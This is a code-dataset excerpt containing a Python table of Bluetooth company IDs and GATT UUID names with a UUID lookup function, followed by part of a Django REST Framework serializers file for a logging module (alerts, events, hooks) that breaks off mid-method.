TendyronCorporation = 0x02a5
RobertBoschGmbH = 0x02a6
IlluxtroninternationalBV = 0x02a7
miSportLtd = 0x02a8
Chargelib = 0x02a9
DopplerLab = 0x02aa
BBPOSLimited = 0x02ab
RTBElektronikGmbHCoKG = 0x02ac
RxNetworksInc = 0x02ad
WeatherFlowInc = 0x02ae
TechnicolorUSAInc = 0x02af
BestechnicLtd = 0x02b0
RadenInc = 0x02b1
JouZenOy = 0x02b2
CLABERSPA = 0x02b3
HyginexInc = 0x02b4
HANSHINELECTRICRAILWAYCOLTD = 0x02b5
SchneiderElectric = 0x02b6
OortTechnologiesLLC = 0x02b7
ChronoTherapeutics = 0x02b8
RinnaiCorporation = 0x02b9
SwissprimeTechnologiesAG = 0x02ba
KohaCoLtd = 0x02bb
GenevacLtd = 0x02bc
Chemtronics = 0x02bd
SeguroTechnologySpzoo = 0x02be
RedbirdFlightSimulations = 0x02bf
DashRobotics = 0x02c0
LINECorporation = 0x02c1
GuillemotCorporation = 0x02c2
TechtronicPowerToolsTechnologyLimited = 0x02c3
WilsonSportingGoods = 0x02c4
LenovoPteLtd = 0x02c5
AyatanSensors = 0x02c6
ElectronicsTomorrowLimited = 0x02c7
VASCODataSecurityInternationalInc = 0x02c8
PayRangeInc = 0x02c9
ABOVSemiconductor = 0x02ca
AINAWirelessInc = 0x02cb
EijkelkampSoilWater = 0x02cc
BMAergonomicsbv = 0x02cd
TevaBrandedPharmaceuticalProductsRDInc = 0x02ce
Anima = 0x02cf
ThreeM = 0x02d0
EmpaticaSrl = 0x02d1
AferoInc = 0x02d2
PowercastCorporation = 0x02d3
SecuyouApS = 0x02d4
OMRONCorporation = 0x02d5
SendSolutions = 0x02d6
NIPPONSYSTEMWARECOLTD = 0x02d7
Neosfar = 0x02d8
FlieglAgrartechnikGmbH = 0x02d9
Gilvader = 0x02da
DigiInternationalInc = 0x02db
DeWalchTechnologiesInc = 0x02dc
FlintRehabilitationDevicesLLC = 0x02dd
SamsungSDSCoLtd = 0x02de
BlurProductDevelopment = 0x02df
UniversityofMichigan = 0x02e0
VictronEnergyBV = 0x02e1
NTTdocomo = 0x02e2
CarmanahTechnologiesCorp = 0x02e3
BytestormLtd = 0x02e4
EspressifIncorporated = 0x02e5
Unwire = 0x02e6
ConnectedYardInc = 0x02e7
AmericanMusicEnvironments = 0x02e8
SensogramTechnologiesInc = 0x02e9
FujitsuLimited = 0x02ea
ArdicTechnology = 0x02eb
DeltaSystemsInc = 0x02ec
HTCCorporation = 0x02ed
CitizenHoldingsCoLtd = 0x02ee
SMARTINNOVATIONinc = 0x02ef
BlackratSoftware = 0x02f0
TheIdeaCaveLLC = 0x02f1
GoProInc = 0x02f2
AuthAirInc = 0x02f3
VensiInc = 0x02f4
IndagemTechLLC = 0x02f5
IntemoTechnologies = 0x02f6
DreamVisionscoLtd = 0x02f7
RunteqOyLtd = 0x02f8
IMAGINATIONTECHNOLOGIESLTD = 0x02f9
CoSTARTechnologies = 0x02fa
ClariusMobileHealthCorp = 0x02fb
ShanghaiFrequenMicroelectronicsCoLtd = 0x02fc
UwannaInc = 0x02fd
LierdaScienceTechnologyGroupCoLtd = 0x02fe
SiliconLaboratories = 0x02ff
WorldMotoInc = 0x0300
GiatecScientificInc = 0x0301
LoopDevicesInc = 0x0302
IACAelectronique = 0x0303
MartiansInc = 0x0304
SwippApS = 0x0305
LifeLaboratoryInc = 0x0306
FUJIINDUSTRIALCOLTD = 0x0307
SurefireLLC = 0x0308
DolbyLabs = 0x0309
Ellisys = 0x030a
MagnitudeLightingConverters = 0x030b
HiltiAG = 0x030c
DevdataSrl = 0x030d
Deviceworx = 0x030e
ShortcutLabs = 0x030f
SGLItaliaSrl = 0x0310
PEEQDATA = 0x0311
DucereTechnologiesPvtLtd = 0x0312
DiveNavInc = 0x0313
RIIGAISpzoo = 0x0314
ThermoFisherScientific = 0x0315
AGMeasurematicsPvtLtd = 0x0316
CHUOElectronicsCOLTD = 0x0317
AspentaInternational = 0x0318
EugsterFrismagAG = 0x0319
AmberwirelessGmbH = 0x031a
HQInc = 0x031b
LabSensorSolutions = 0x031c
EnterlabApS = 0x031d
EyefiInc = 0x031e
MetaSystemSpA = 0x031f
SONOELECTRONICSCOLTD = 0x0320
Jewelbots = 0x0321
CompumedicsLimited = 0x0322
RotorBikeComponents = 0x0323
AstroInc = 0x0324
AmotusSolutions = 0x0325
HealthwearTechnologiesLtd = 0x0326
EssexElectronics = 0x0327
GrundfosAS = 0x0328
EargoInc = 0x0329
ElectronicDesignLab = 0x032a
ESYLUX = 0x032b
NIPPONSMTCOLtd = 0x032c
BMinnovationsGmbH = 0x032d
indoormap = 0x032e
OttoQInc = 0x032f
NorthPoleEngineering = 0x0330
ThreeFlaresTechnologiesInc = 0x0331
ElectrocompanietAS = 0x0332
MulTLock = 0x0333
CorentiumAS = 0x0334
EnlightedInc = 0x0335
GISTIC = 0x0336
AJP2HoldingsLLC = 0x0337
COBIGmbH = 0x0338
BlueSkyScientificLLCB = 0x0339
AppceptionInc = 0x033a
CourtneyThorneLimited = 0x033b
Virtuosys = 0x033c
TPVTechnologyLimited = 0x033d
MonitraSA = 0x033e
AutomationComponentsInc = 0x033f
Letsensesrl = 0x0340
EtesianTechnologiesLLC = 0x0341
GERTECBRASILLTDA = 0x0342
DrekkerDevelopmentPtyLtd = 0x0343
WhirlInc = 0x0344
LocusPositioning = 0x0345
AcuityBrandsLightingInc = 0x0346
PreventBiometrics = 0x0347
Arioneo = 0x0348
VersaMe = 0x0349
Vaddio = 0x034a
LibratoneAS = 0x034b
HMElectronicsInc = 0x034c
TASERInternationalInc = 0x034d
SafeTrustInc = 0x034e
HeartlandPaymentSystems = 0x034f
BitstrataSystemsInc = 0x0350
PiepsGmbH = 0x0351
iRidingTechnologyCoLtd = 0x0352
AlphaAudiotronicsInc = 0x0353
TOPPANFORMSCOLTD = 0x0354
SigmaDesignsInc = 0x0355
RESERVED = 0xffff
ALL_16BIT_UUIDS = {
0x0001: "SDP",
0x0003: "RFCOMM",
0x0005: "TCS-BIN",
0x0007: "ATT",
0x0008: "OBEX",
0x000f: "BNEP",
0x0010: "UPNP",
0x0011: "HIDP",
0x0012: "Hardcopy Control Channel",
0x0014: "Hardcopy Data Channel",
0x0016: "Hardcopy Notification",
0x0017: "AVCTP",
0x0019: "AVDTP",
0x001b: "CMTP",
0x001e: "MCAP Control Channel",
0x001f: "MCAP Data Channel",
0x0100: "L2CAP",
# 0x0101 to 0x0fff undefined */
0x1000: "Service Discovery Server Service Class",
0x1001: "Browse Group Descriptor Service Class",
0x1002: "Public Browse Root",
# 0x1003 to 0x1100 undefined */
0x1101: "Serial Port",
0x1102: "LAN Access Using PPP",
0x1103: "Dialup Networking",
0x1104: "IrMC Sync",
0x1105: "OBEX Object Push",
0x1106: "OBEX File Transfer",
0x1107: "IrMC Sync Command",
0x1108: "Headset",
0x1109: "Cordless Telephony",
0x110a: "Audio Source",
0x110b: "Audio Sink",
0x110c: "A/V Remote Control Target",
0x110d: "Advanced Audio Distribution",
0x110e: "A/V Remote Control",
0x110f: "A/V Remote Control Controller",
0x1110: "Intercom",
0x1111: "Fax",
0x1112: "Headset AG",
0x1113: "WAP",
0x1114: "WAP Client",
0x1115: "PANU",
0x1116: "NAP",
0x1117: "GN",
0x1118: "Direct Printing",
0x1119: "Reference Printing",
0x111a: "Basic Imaging Profile",
0x111b: "Imaging Responder",
0x111c: "Imaging Automatic Archive",
0x111d: "Imaging Referenced Objects",
0x111e: "Handsfree",
0x111f: "Handsfree Audio Gateway",
0x1120: "Direct Printing Refrence Objects Service",
0x1121: "Reflected UI",
0x1122: "Basic Printing",
0x1123: "Printing Status",
0x1124: "Human Interface Device Service",
0x1125: "Hardcopy Cable Replacement",
0x1126: "HCR Print",
0x1127: "HCR Scan",
0x1128: "Common ISDN Access",
# 0x1129 and 0x112a undefined */
0x112d: "SIM Access",
0x112e: "Phonebook Access Client",
0x112f: "Phonebook Access Server",
0x1130: "Phonebook Access",
0x1131: "Headset HS",
0x1132: "Message Access Server",
0x1133: "Message Notification Server",
0x1134: "Message Access Profile",
0x1135: "GNSS",
0x1136: "GNSS Server",
0x1137: "3D Display",
0x1138: "3D Glasses",
0x1139: "3D Synchronization",
0x113a: "MPS Profile",
0x113b: "MPS Service",
# 0x113c to 0x11ff undefined */
0x1200: "PnP Information",
0x1201: "Generic Networking",
0x1202: "Generic File Transfer",
0x1203: "Generic Audio",
0x1204: "Generic Telephony",
0x1205: "UPNP Service",
0x1206: "UPNP IP Service",
0x1300: "UPNP IP PAN",
0x1301: "UPNP IP LAP",
0x1302: "UPNP IP L2CAP",
0x1303: "Video Source",
0x1304: "Video Sink",
0x1305: "Video Distribution",
# 0x1306 to 0x13ff undefined */
0x1400: "HDP",
0x1401: "HDP Source",
0x1402: "HDP Sink",
# 0x1403 to 0x17ff undefined */
0x1800: "Generic Access Profile",
0x1801: "Generic Attribute Profile",
0x1802: "Immediate Alert",
0x1803: "Link Loss",
0x1804: "Tx Power",
0x1805: "Current Time Service",
0x1806: "Reference Time Update Service",
0x1807: "Next DST Change Service",
0x1808: "Glucose",
0x1809: "Health Thermometer",
0x180a: "Device Information",
# 0x180b and 0x180c undefined */
0x180d: "Heart Rate",
0x180e: "Phone Alert Status Service",
0x180f: "Battery Service",
0x1810: "Blood Pressure",
0x1811: "Alert Notification Service",
0x1812: "Human Interface Device",
0x1813: "Scan Parameters",
0x1814: "Running Speed and Cadence",
0x1815: "Automation IO",
0x1816: "Cycling Speed and Cadence",
# 0x1817 undefined */
0x1818: "Cycling Power",
0x1819: "Location and Navigation",
0x181a: "Environmental Sensing",
0x181b: "Body Composition",
0x181c: "User Data",
0x181d: "Weight Scale",
0x181e: "Bond Management",
0x181f: "Continuous Glucose Monitoring",
0x1820: "Internet Protocol Support",
0x1821: "Indoor Positioning",
0x1822: "Pulse Oximeter",
0x1823: "HTTP Proxy",
0x1824: "Transport Discovery",
0x1825: "Object Transfer",
# 0x1824 to 0x27ff undefined */
0x2800: "Primary Service",
0x2801: "Secondary Service",
0x2802: "Include",
0x2803: "Characteristic",
# 0x2804 to 0x28ff undefined */
0x2900: "Characteristic Extended Properties",
0x2901: "Characteristic User Description",
0x2902: "Client Characteristic Configuration",
0x2903: "Server Characteristic Configuration",
0x2904: "Characteristic Format",
0x2905: "Characteristic Aggregate Formate",
0x2906: "Valid Range",
0x2907: "External Report Reference",
0x2908: "Report Reference",
0x2909: "Number of Digitals",
0x290a: "Value Trigger Setting",
0x290b: "Environmental Sensing Configuration",
0x290c: "Environmental Sensing Measurement",
0x290d: "Environmental Sensing Trigger Setting",
0x290e: "Time Trigger Setting",
# 0x290f to 0x29ff undefined */
0x2a00: "Device Name",
0x2a01: "Appearance",
0x2a02: "Peripheral Privacy Flag",
0x2a03: "Reconnection Address",
0x2a04: "Peripheral Preferred Connection Parameters",
0x2a05: "Service Changed",
0x2a06: "Alert Level",
0x2a07: "Tx Power Level",
0x2a08: "Date Time",
0x2a09: "Day of Week",
0x2a0a: "Day Date Time",
# 0x2a0b undefined */
0x2a0c: "Exact Time 256",
0x2a0d: "DST Offset",
0x2a0e: "Time Zone",
0x2a0f: "Local Time Information",
# 0x2a10 undefined */
0x2a11: "Time with DST",
0x2a12: "Time Accuracy",
0x2a13: "Time Source",
0x2a14: "Reference Time Information",
# 0x2a15 undefined */
0x2a16: "Time Update Control Point",
0x2a17: "Time Update State",
0x2a18: "Glucose Measurement",
0x2a19: "Battery Level",
# 0x2a1a and 0x2a1b undefined */
0x2a1c: "Temperature Measurement",
0x2a1d: "Temperature Type",
0x2a1e: "Intermediate Temperature",
# 0x2a1f and 0x2a20 undefined */
0x2a21: "Measurement Interval",
0x2a22: "Boot Keyboard Input Report",
0x2a23: "System ID",
0x2a24: "Model Number String",
0x2a25: "Serial Number String",
0x2a26: "Firmware Revision String",
0x2a27: "Hardware Revision String",
0x2a28: "Software Revision String",
0x2a29: "Manufacturer Name String",
0x2a2a: "IEEE 11073-20601 Regulatory Cert. Data List",
0x2a2b: "Current Time",
0x2a2c: "Magnetic Declination",
# 0x2a2d to 0x2a30 undefined */
0x2a31: "Scan Refresh",
0x2a32: "Boot Keyboard Output Report",
0x2a33: "Boot Mouse Input Report",
0x2a34: "Glucose Measurement Context",
0x2a35: "Blood Pressure Measurement",
0x2a36: "Intermediate Cuff Pressure",
0x2a37: "Heart Rate Measurement",
0x2a38: "Body Sensor Location",
0x2a39: "Heart Rate Control Point",
# 0x2a3a to 0x2a3e undefined */
0x2a3f: "Alert Status",
0x2a40: "Ringer Control Point",
0x2a41: "Ringer Setting",
0x2a42: "Alert Category ID Bit Mask",
0x2a43: "Alert Category ID",
0x2a44: "Alert Notification Control Point",
0x2a45: "Unread Alert Status",
0x2a46: "New Alert",
0x2a47: "Supported New Alert Category",
0x2a48: "Supported Unread Alert Category",
0x2a49: "Blood Pressure Feature",
0x2a4a: "HID Information",
0x2a4b: "Report Map",
0x2a4c: "HID Control Point",
0x2a4d: "Report",
0x2a4e: "Protocol Mode",
0x2a4f: "Scan Interval Window",
0x2a50: "PnP ID",
0x2a51: "Glucose Feature",
0x2a52: "Record Access Control Point",
0x2a53: "RSC Measurement",
0x2a54: "RSC Feature",
0x2a55: "SC Control Point",
0x2a56: "Digital",
# 0x2a57 undefined */
0x2a58: "Analog",
# 0x2a59 undefined */
0x2a5a: "Aggregate",
0x2a5b: "CSC Measurement",
0x2a5c: "CSC Feature",
0x2a5d: "Sensor Location",
# 0x2a5e to 0x2a62 undefined */
0x2a63: "Cycling Power Measurement",
0x2a64: "Cycling Power Vector",
0x2a65: "Cycling Power Feature",
0x2a66: "Cycling Power Control Point",
0x2a67: "Location and Speed",
0x2a68: "Navigation",
0x2a69: "Position Quality",
0x2a6a: "LN Feature",
0x2a6b: "LN Control Point",
0x2a6c: "Elevation",
0x2a6d: "Pressure",
0x2a6e: "Temperature",
0x2a6f: "Humidity",
0x2a70: "True Wind Speed",
0x2a71: "True Wind Direction",
0x2a72: "Apparent Wind Speed",
0x2a73: "Apparent Wind Direction",
0x2a74: "Gust Factor",
0x2a75: "Pollen Concentration",
0x2a76: "UV Index",
0x2a77: "Irradiance",
0x2a78: "Rainfall",
0x2a79: "Wind Chill",
0x2a7a: "Heat Index",
0x2a7b: "Dew Point",
0x2a7c: "Trend",
0x2a7d: "Descriptor Value Changed",
0x2a7e: "Aerobic Heart Rate Lower Limit",
0x2a7f: "Aerobic Threshold",
0x2a80: "Age",
0x2a81: "Anaerobic Heart Rate Lower Limit",
0x2a82: "Anaerobic Heart Rate Upper Limit",
0x2a83: "Anaerobic Threshold",
0x2a84: "Aerobic Heart Rate Upper Limit",
0x2a85: "Date of Birth",
0x2a86: "Date of Threshold Assessment",
0x2a87: "Email Address",
0x2a88: "Fat Burn Heart Rate Lower Limit",
0x2a89: "Fat Burn Heart Rate Upper Limit",
0x2a8a: "First Name",
0x2a8b: "Five Zone Heart Rate Limits",
0x2a8c: "Gender",
0x2a8d: "Heart Rate Max",
0x2a8e: "Height",
0x2a8f: "Hip Circumference",
0x2a90: "Last Name",
0x2a91: "Maximum Recommended Heart Rate",
0x2a92: "Resting Heart Rate",
0x2a93: "Sport Type for Aerobic/Anaerobic Thresholds",
0x2a94: "Three Zone Heart Rate Limits",
0x2a95: "Two Zone Heart Rate Limit",
0x2a96: "VO2 Max",
0x2a97: "Waist Circumference",
0x2a98: "Weight",
0x2a99: "Database Change Increment",
0x2a9a: "User Index",
0x2a9b: "Body Composition Feature",
0x2a9c: "Body Composition Measurement",
0x2a9d: "Weight Measurement",
0x2a9e: "Weight Scale Feature",
0x2a9f: "User Control Point",
0x2aa0: "Magnetic Flux Density - 2D",
0x2aa1: "Magnetic Flux Density - 3D",
0x2aa2: "Language",
0x2aa3: "Barometric Pressure Trend",
0x2aa4: "Bond Management Control Point",
0x2aa5: "Bond Management Feature",
0x2aa6: "Central Address Resolution",
0x2aa7: "CGM Measurement",
0x2aa8: "CGM Feature",
0x2aa9: "CGM Status",
0x2aaa: "CGM Session Start Time",
0x2aab: "CGM Session Run Time",
0x2aac: "CGM Specific Ops Control Point",
0x2aad: "Indoor Positioning Configuration",
0x2aae: "Latitude",
0x2aaf: "Longitude",
0x2ab0: "Local North Coordinate",
0x2ab1: "Local East Coordinate",
0x2ab2: "Floor Number",
0x2ab3: "Altitude",
0x2ab4: "Uncertainty",
0x2ab5: "Location Name",
0x2ab6: "URI",
0x2ab7: "HTTP Headers",
0x2ab8: "HTTP Status Code",
0x2ab9: "HTTP Entity Body",
0x2aba: "HTTP Control Point",
0x2abb: "HTTPS Security",
0x2abc: "TDS Control Point",
0x2abd: "OTS Feature",
0x2abe: "Object Name",
0x2abf: "Object Type",
0x2ac0: "Object Size",
0x2ac1: "Object First-Created",
0x2ac2: "Object Last-Modified",
0x2ac3: "Object ID",
0x2ac4: "Object Properties",
0x2ac5: "Object Action Control Point",
0x2ac6: "Object List Control Point",
0x2ac7: "Object List Filter",
0x2ac8: "Object Changed",
# vendor defined */
0xfeff: "GN Netcom",
0xfefe: "GN ReSound A/S",
0xfefd: "Gimbal, Inc.",
0xfefc: "Gimbal, Inc.",
0xfefb: "Stollmann E+V GmbH",
0xfefa: "PayPal, Inc.",
0xfef9: "PayPal, Inc.",
0xfef8: "Aplix Corporation",
0xfef7: "Aplix Corporation",
0xfef6: "Wicentric, Inc.",
0xfef5: "Dialog Semiconductor GmbH",
0xfef4: "Google",
0xfef3: "Google",
0xfef2: "CSR",
0xfef1: "CSR",
0xfef0: "Intel",
0xfeef: "Polar Electro Oy",
0xfeee: "Polar Electro Oy",
0xfeed: "Tile, Inc.",
0xfeec: "Tile, Inc.",
0xfeeb: "Swirl Networks, Inc.",
0xfeea: "Swirl Networks, Inc.",
0xfee9: "Quintic Corp.",
0xfee8: "Quintic Corp.",
0xfee7: "Tencent Holdings Limited",
0xfee6: "Seed Labs, Inc.",
0xfee5: "Nordic Semiconductor ASA",
0xfee4: "Nordic Semiconductor ASA",
0xfee3: "Anki, Inc.",
0xfee2: "Anki, Inc.",
0xfee1: "Anhui Huami Information Technology Co.",
0xfee0: "Anhui Huami Information Technology Co.",
0xfedf: "Design SHIFT",
0xfede: "Coin, Inc.",
0xfedd: "Jawbone",
0xfedc: "Jawbone",
0xfedb: "Perka, Inc.",
0xfeda: "ISSC Technologies Corporation",
0xfed9: "Pebble Technology Corporation",
0xfed8: "Google",
0xfed7: "Broadcom Corporation",
0xfed6: "Broadcom Corporation",
0xfed5: "Plantronics Inc.",
0xfed4: "Apple, Inc.",
0xfed3: "Apple, Inc.",
0xfed2: "Apple, Inc.",
0xfed1: "Apple, Inc.",
0xfed0: "Apple, Inc.",
0xfecf: "Apple, Inc.",
0xfece: "Apple, Inc.",
0xfecd: "Apple, Inc.",
0xfecc: "Apple, Inc.",
0xfecb: "Apple, Inc.",
0xfeca: "Apple, Inc.",
0xfec9: "Apple, Inc.",
0xfec8: "Apple, Inc.",
0xfec7: "Apple, Inc.",
0xfec6: "Kocomojo, LLC",
0xfec5: "Realtek Semiconductor Corp.",
0xfec4: "PLUS Location Systems",
0xfec3: "360fly, Inc.",
0xfec2: "Blue Spark Technologies, Inc.",
0xfec1: "KDDI Corporation",
0xfec0: "KDDI Corporation",
0xfebf: "Nod, Inc.",
0xfebe: "Bose Corporation",
0xfebd: "Clover Network, Inc.",
0xfebc: "Dexcom, Inc.",
0xfebb: "adafruit industries",
0xfeba: "Tencent Holdings Limited",
0xfeb9: "LG Electronics",
0xfeb8: "Facebook, Inc.",
0xfeb7: "Facebook, Inc.",
0xfeb6: "Vencer Co, Ltd",
0xfeb5: "WiSilica Inc.",
0xfeb4: "WiSilica Inc.",
0xfeb3: "Taobao",
0xfeb2: "Microsoft Corporation",
0xfeb1: "Electronics Tomorrow Limited",
0xfeb0: "Nest Labs Inc.",
0xfeaf: "Nest Labs Inc.",
0xfeae: "Nokia Corporation",
0xfead: "Nokia Corporation",
0xfeac: "Nokia Corporation",
0xfeab: "Nokia Corporation",
0xfeaa: "Google",
0xfea9: "Savant Systems LLC",
0xfea8: "Savant Systems LLC",
0xfea7: "UTC Fire and Security",
0xfea6: "GoPro, Inc.",
0xfea5: "GoPro, Inc.",
0xfea4: "Paxton Access Ltd",
0xfea3: "ITT Industries",
0xfea2: "Intrepid Control Systems, Inc.",
0xfea1: "Intrepid Control Systems, Inc.",
0xfea0: "Google",
0xfe9f: "Google",
0xfe9e: "Dialog Semiconductor B.V.",
0xfe9d: "Mobiquity Networks Inc",
0xfe9c: "GSI Laboratories, Inc.",
0xfe9b: "Samsara Networks, Inc",
0xfe9a: "Estimote",
0xfe99: "Currant, Inc.",
0xfe98: "Currant, Inc.",
0xfe97: "Tesla Motor Inc.",
0xfe96: "Tesla Motor Inc.",
0xfe95: "Xiaomi Inc.",
0xfe94: "OttoQ Inc.",
0xfe93: "OttoQ Inc.",
0xfe92: "Jarden Safety & Security",
0xfe91: "Shanghai Imilab Technology Co.,Ltd",
0xfe90: "JUMA",
0xfe8f: "CSR",
0xfe8e: "ARM Ltd",
0xfe8d: "Interaxon Inc.",
0xfe8c: "TRON Forum",
0xfe8b: "Apple, Inc.",
0xfe8a: "Apple, Inc.",
0xfe89: "B&O Play A/S",
0xfe88: "SALTO SYSTEMS S.L.",
0xfe87: "Qingdao Yeelink Information Technology Co., Ltd. ( 青岛亿联客信息技术有限公司 )",
0xfe86: "HUAWEI Technologies Co., Ltd. ( 华为技术有限公司 )",
0xfe85: "RF Digital Corp",
0xfe84: "RF Digital Corp",
0xfe83: "Blue Bite",
0xfe82: "Medtronic Inc.",
0xfe81: "Medtronic Inc.",
0xfe80: "Doppler Lab",
0xfe7f: "Doppler Lab",
0xfe7e: "Awear Solutions Ltd",
0xfe7d: "Aterica Health Inc.",
0xfe7c: "Stollmann E+V GmbH",
0xfe7b: "Orion Labs, Inc.",
0xfe7a: "Bragi GmbH",
0xfe79: "Zebra Technologies",
0xfe78: "Hewlett-Packard Company",
0xfe77: "Hewlett-Packard Company",
0xfe76: "TangoMe",
0xfe75: "TangoMe",
0xfe74: "unwire",
0xfe73: "St. Jude Medical, Inc.",
0xfe72: "St. Jude Medical, Inc.",
0xfe71: "Plume Design Inc",
0xfe70: "Beijing Jingdong Century Trading Co., Ltd.",
0xfe6f: "LINE Corporation",
0xfe6e: "The University of Tokyo",
0xfe6d: "The University of Tokyo",
0xfe6c: "TASER International, Inc.",
0xfe6b: "TASER International, Inc.",
0xfe6a: "Kontakt Micro-Location Sp. z o.o.",
0xfe69: "Qualcomm Life Inc",
0xfe68: "Qualcomm Life Inc",
0xfe67: "Lab Sensor Solutions",
0xfe66: "Intel Corporation",
# SDO defined */
0xfffe: "Alliance for Wireless Power (A4WP)",
0xfffd: "Fast IDentity Online Alliance (FIDO)",
}
ALL_128BIT_UUIDS = {
"a3c87500-8ed3-4bdf-8a39-a01bebede295": "Eddystone Configuration Service",
"a3c87501-8ed3-4bdf-8a39-a01bebede295": "Capabilities",
"a3c87502-8ed3-4bdf-8a39-a01bebede295": "Active Slot",
"a3c87503-8ed3-4bdf-8a39-a01bebede295": "Advertising Interval",
"a3c87504-8ed3-4bdf-8a39-a01bebede295": "Radio Tx Power",
"a3c87505-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Advertised Tx Power",
"a3c87506-8ed3-4bdf-8a39-a01bebede295": "Lock State",
"a3c87507-8ed3-4bdf-8a39-a01bebede295": "Unlock",
"a3c87508-8ed3-4bdf-8a39-a01bebede295": "Public ECDH Key",
"a3c87509-8ed3-4bdf-8a39-a01bebede295": "EID Identity Key",
"a3c8750a-8ed3-4bdf-8a39-a01bebede295": "ADV Slot Data",
"a3c8750b-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Factory reset",
"a3c8750c-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Remain Connectable",
# BBC micro:bit Bluetooth Profiles */
"e95d0753-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Service",
"e95dca4b-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Data",
"e95dfb24-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Period",
"e95df2d8-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Service",
"e95dfb11-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Data",
"e95d386c-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Period",
"e95d9715-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Bearing",
"e95d9882-251d-470a-a062-fa1922dfa9a8": "MicroBit Button Service",
"e95dda90-251d-470a-a062-fa1922dfa9a8": "MicroBit Button A State",
"e95dda91-251d-470a-a062-fa1922dfa9a8": "MicroBit Button B State",
"e95d127b-251d-470a-a062-fa1922dfa9a8": "MicroBit IO PIN Service",
"e95d8d00-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN Data",
"e95d5899-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN AD Configuration",
"e95dd822-251d-470a-a062-fa1922dfa9a8": "MicroBit PWM Control",
"e95dd91d-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Service",
"e95d7b77-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Matrix state",
"e95d93ee-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Text",
"e95d0d2d-251d-470a-a062-fa1922dfa9a8": "MicroBit Scrolling Delay",
"e95d93af-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Service",
"e95db84c-251d-470a-a062-fa1922dfa9a8": "MicroBit Requirements",
"e95d9775-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Data",
"e95d23c4-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Requirements",
"e95d5404-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Events",
"e95d93b0-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control Service",
"e95d93b1-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control",
"e95d6100-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Service",
"e95d1b25-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Period",
# Nordic UART Port Emulation */
"6e400001-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART Service",
"6e400002-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART TX",
"6e400003-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART RX",
}
def uuid_to_string(uuid):
"""
For a given UUID string, try to determine the textual equivalent
of the GATT service or characteristic.
"""
if not isinstance(uuid, str):
raise TypeError("Expected a UUID string.")
if len(uuid) != 36:
raise ValueError("Expected the UUID string to be 36 characters long.")
uuid_text = ALL_128BIT_UUIDS.get(uuid, None)
if uuid_text is not None:
return uuid_text
else:
if uuid.endswith("-0000-1000-8000-00805f9b34fb"):
uuid_service = int(uuid[:8], 16)
return ALL_16BIT_UUIDS.get(uuid_service, None)
else:
return None
|
mit
| 6,484,401,005,254,201,000
| 30.06422
| 81
| 0.698386
| false
| 2.615749
| false
| false
| false
|
opennode/nodeconductor
|
waldur_core/logging/serializers.py
|
1
|
5531
|
from django.db import IntegrityError
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from waldur_core.core.fields import MappedChoiceField, NaturalChoiceField
from waldur_core.core.serializers import GenericRelatedField
from waldur_core.logging import models, utils, loggers
class AlertSerializer(serializers.HyperlinkedModelSerializer):
scope = GenericRelatedField(related_models=utils.get_loggable_models())
severity = MappedChoiceField(
choices=[(v, k) for k, v in models.Alert.SeverityChoices.CHOICES],
choice_mappings={v: k for k, v in models.Alert.SeverityChoices.CHOICES},
)
context = serializers.JSONField(read_only=True)
class Meta(object):
model = models.Alert
fields = (
'url', 'uuid', 'alert_type', 'message', 'severity', 'scope',
'created', 'closed', 'context', 'acknowledged',
)
read_only_fields = ('uuid', 'created', 'closed')
extra_kwargs = {
'url': {'lookup_field': 'uuid'},
}
def create(self, validated_data):
try:
alert, created = loggers.AlertLogger().process(
severity=validated_data['severity'],
message_template=validated_data['message'],
scope=validated_data['scope'],
alert_type=validated_data['alert_type'],
)
except IntegrityError:
# In case of simultaneous requests serializer validation can pass for both alerts,
# so we need to handle DB IntegrityError separately.
raise serializers.ValidationError(_('Alert with given type and scope already exists.'))
else:
return alert
class EventSerializer(serializers.Serializer):
level = serializers.ChoiceField(choices=['debug', 'info', 'warning', 'error'])
message = serializers.CharField()
scope = GenericRelatedField(related_models=utils.get_loggable_models(), required=False)
class BaseHookSerializer(serializers.HyperlinkedModelSerializer):
author_uuid = serializers.ReadOnlyField(source='user.uuid')
hook_type = serializers.SerializerMethodField()
class Meta(object):
model = models.BaseHook
fields = (
'url', 'uuid', 'is_active', 'author_uuid',
'event_types', 'event_groups', 'created', 'modified',
'hook_type'
)
extra_kwargs = {
'url': {'lookup_field': 'uuid'},
}
def get_fields(self):
"""
When static declaration is used, event type choices are fetched too early -
even before all apps are initialized. As a result, some event types are missing.
When dynamic declaration is used, all valid event types are available as choices.
"""
fields = super(BaseHookSerializer, self).get_fields()
fields['event_types'] = serializers.MultipleChoiceField(
choices=loggers.get_valid_events(), required=False)
fields['event_groups'] = serializers.MultipleChoiceField(
choices=loggers.get_event_groups_keys(), required=False)
return fields
def create(self, validated_data):
validated_data['user'] = self.context['request'].user
return super(BaseHookSerializer, self).create(validated_data)
def validate(self, attrs):
if not self.instance and 'event_types' not in attrs and 'event_groups' not in attrs:
raise serializers.ValidationError(_('Please specify list of event_types or event_groups.'))
if 'event_groups' in attrs:
events = list(attrs.get('event_types', []))
groups = list(attrs.get('event_groups', []))
events = sorted(set(loggers.expand_event_groups(groups)) | set(events))
attrs['event_types'] = events
attrs['event_groups'] = groups
elif 'event_types' in attrs:
